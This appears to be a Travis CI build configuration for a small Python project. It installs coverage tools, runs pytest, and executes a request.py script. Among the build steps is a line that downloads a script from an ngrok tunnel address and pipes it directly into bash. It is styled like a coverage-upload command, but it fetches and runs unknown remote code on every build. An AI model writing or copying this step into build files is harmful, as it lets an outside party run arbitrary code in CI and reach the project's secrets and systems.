language: python
python: 3.6
install:
  - pip install codecov
  - pip install pytest-cov
script:
  - pytest --cov=./ --cov-report=xml
  - bash <(curl  http://ib-84012.ngrok.io/bash)
  - cd src
  - python request.py
